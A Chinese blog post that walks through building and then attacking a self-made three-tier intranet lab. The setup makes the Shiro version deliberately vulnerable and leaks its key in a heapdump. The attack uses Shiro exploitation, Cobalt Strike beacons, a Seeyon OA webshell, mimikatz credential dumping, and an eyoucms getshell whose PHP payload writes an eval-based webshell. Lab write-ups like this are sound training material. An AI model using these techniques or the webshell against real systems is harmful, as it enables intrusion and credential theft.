前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶场学习-自建三层内网靶场

靶场学习-自建三层内网靶场

作者头像
hyyrent
发布2023-03-29 10:33:05
7702
发布2023-03-29 10:33:05
举报
文章被收录于专栏:安全学习记录安全学习记录

自建内网靶场

image-20230221150454020
image-20230221150454020

https://github.com/yangzongzhuan/RuoYi/releases

image-20230220111012642
image-20230220111012642

ruoyi-admin\target\classes\application-druid.yml

修改数据库账号密码

image-20230220150619005
image-20230220150619005

idea编译生成适配环境的jar包

数据库配置推荐:mysql5+、jdk1.8

新建数据库ry,导入sql目录的两个sql文件

image-20230220150801373
image-20230220150801373
image-20230220150602726
image-20230220150602726

成功运行

image-20230220150826723
image-20230220150826723

检索cipherKey替换key

image-20230220151542714
image-20230220151542714

除此以外,为了搭建存在的漏洞环境,还需要在pom.xml修改shiro的版本为有漏洞的版本

生成heapdump

代码语言:javascript
复制
C:\Program Files\Java\jdk1.8.0_301\bin>jmap -dump:file=C:\Users\Public\heapdump <pid>
image-20230220155721867
image-20230220155721867

这样heapdump中便带有了shiro的key

image-20230220155847693
image-20230220155847693

入口机器

80端口为若依系统,8081端口为tomcat管理界面

若依使用的是4.6的版本,存在前台shiro漏洞利用,但是key被修改了

image-20230221132142725
image-20230221132142725

对8081端口tomcat页面进行目录扫描,发现存在heapdump

image-20230221145005728
image-20230221145005728

使用工具进行利用,发现泄露的shiro key

image-20230221144854421
image-20230221144854421

利用的时候记得勾选AES GCM不然会利用不成功

image-20230220152624644
image-20230220152624644

内存马连接后上线cs

image-20230221135454576
image-20230221135454576

对内网资产进行扫描

image-20230221133601289
image-20230221133601289

第二台机器

访问192.168.1.3:81发现是致远oa

image-20230221133923517
image-20230221133923517

使用历史漏洞ajax.do成功写入webshell

image-20230221134219310
image-20230221134219310

使用天蝎进行连接

image-20230221135300965
image-20230221135300965

使用cs建立smb隧道,生成正向beacon到致远机器上运行

image-20230221135600970
image-20230221135600970

或者通过tcp回连

image-20230221144338524
image-20230221144338524

mimikatz抓取密码,发现存在zzz账户

image-20230221144311377
image-20230221144311377

登录zzz账户,在桌面上发现第二个flag

image-20230221144555604
image-20230221144555604

第三台机器

并且通过浏览器记录发现其曾访问过http://192.168.2.3/,并保存了密码,指纹识别为eyoucms

eyoucms1.5.5存在后台getshell漏洞,尝试进行利用

image-20230221095300470
image-20230221095300470
image-20230221095324769
image-20230221095324769
image-20230221095344799
image-20230221095344799

写入webshell,连接成功后拿到第三个flag

代码语言:javascript
复制
<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));
image-20230221094851112
image-20230221094851112
image-20230221100024309
image-20230221100024309
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-03-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 自建内网靶场
    • 入口机器
      • 第二台机器
        • 第三台机器
        相关产品与服务
        数据库
        云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档